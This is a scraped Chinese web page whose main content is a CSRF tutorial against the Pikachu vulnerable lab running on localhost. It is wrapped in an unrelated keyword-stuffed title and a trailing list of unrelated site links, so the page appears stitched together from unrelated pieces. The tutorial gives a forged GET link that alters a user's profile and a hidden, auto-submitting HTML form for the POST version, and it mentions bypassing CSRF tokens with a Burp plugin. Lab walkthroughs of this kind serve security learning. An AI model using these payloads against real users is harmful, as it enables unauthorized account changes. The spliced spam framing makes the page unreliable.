当前位置: 首页 > news >正文

网站新建设请示360建站的应用场景

网站新建设请示,360建站的应用场景,wordpress商城加导购,网站规划可以分成哪几步CSRF: 介绍#xff1a; Cross-site request forgery简称为CSRF”。 在CSF的攻击场景中攻击者会伪造一个请求#xff08;这个请求一般是一个链接#xff09; 然后欺骗目标用户进行点击#xff0c;用户一旦点击了这个请求#xff0c;整个攻击也就完成了#xff0…CSRF: 介绍 Cross-site request forgery简称为CSRF”。 在CSF的攻击场景中攻击者会伪造一个请求这个请求一般是一个链接 然后欺骗目标用户进行点击用户一旦点击了这个请求整个攻击也就完成了本题是修改个人信息。 所以CSRF攻击也被称为为one click攻击。 1.CSRF(get) 我们先登录lucy的账号点击修改信息顺便用bp抓个包。 成功抓到数据包看到get请求 GET /vul/csrf/csrfget/csrf_get_edit.php?sexgirlphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sexgirlphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit 我们把性别改成男 http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sexboyphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit 若lucy此时登录了该网站点击了我们构造的 url 就会修改个人信息。 这里也可以使用一些短链接的方式。lucy访问该网站即可修改信息。 2.CSRF(post): 这里依旧拿lucy的个人信息实验我们点击随便修改一下个人信息顺便bp抓包。 此时 lucy 信息 post传参的话需要我们自己创一个表单进行提交。 sexboyphonenum111111addbeijingemaillucy%40pikachu.comsubmitsubmit -------------------- 我们自己创一个html的文件放到服务器上 htmlscript !-- 这个script是用来自动提交表单的 --window.onload function() {document.getElementById(submit).click();}/script bodyform actionhttp://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php methodPOST input typehidden namesex valueboy /input typehidden namephonenum value111222 /input typehidden nameadd valuebeijing /input typehidden nameemail valuelucypikachu.com /input typehidden namesubmit valuesubmit /input idsubmit typesubmit valueSubmit request styledisplay:none/ !-- style设置为display:none起到隐藏submit按钮的作用 --/form/body /html 利用phpstudy将文件路径放到pikachu目录下访问后修过成功。 http://127.0.0.1/pikachu/srf_post.php 3.CSRF Token: 这个时候我们可以利用 burp suite 的插件 CSRF Token Tracker 来绕过 此时lucy个人信息如下和抓包信息。 插件信息 修改数据包刷新lucy的个人信息即可发现数据被更改。
http://www.hkea.cn/news/14592217/

相关文章:

  • 网站建设需要多大的服务器wordpress文章分类表
  • 建设网站相关法律条文做网站为什么要建站点
  • 学校文化建设网站网站 微信
  • oracle 网站开发wordpress时间不准
  • 上海seo网站推广公司千页网素材官网入口
  • 淘宝客网站免费建设网站不做备案
  • 网站建设报价选兴田德润千博企业网站管理系统 后台拿shell
  • 盐山网站建设上海中学分数线
  • 深圳市网站建设公司排名郑州五合一网站建设
  • 软件推广的渠道是哪里找的西安网站建设优化服务公司
  • 绿色主色调网站平阳做网站
  • 住房和城乡建设岗位评定网站凡科网络科技有限公司
  • 百度做的网站后台怎么更新天津 交友 网站建设
  • 温州网站优化价格wordpress英文版 菜单
  • 如何查网站建设者ip自媒体平台注册入口账
  • 菠菜网站如何做推广关键词热度查询工具
  • 电子商务网站设计中影响客户体验的元素有安监局网站建设方案
  • 男女做那个视频网站php网站开发项目
  • 钮奇网站建设传奇世界网页版平台
  • 石家庄做标书的网站手工做衣服网站
  • 汝南专业网站建设公司新闻做网站
  • 电子商务网站建设技术有哪些方面建设工程合同管理论文
  • 深圳做网站哪家最好在哪家网站做推广好
  • wordpress 中型网站国内人做韩国网站一般都卖什么东西
  • 招聘网站报表怎么做营销方式方案案例
  • 如何制作网站链接高端建材门店年销售额
  • 泊头做网站价格青岛圭谷网站建设公司
  • 网站报价收费单优秀企业网站的特点
  • 行唐县网站建设公司wordpress 调用全文
  • 凡科建站多少钱做狗狗网站的背景图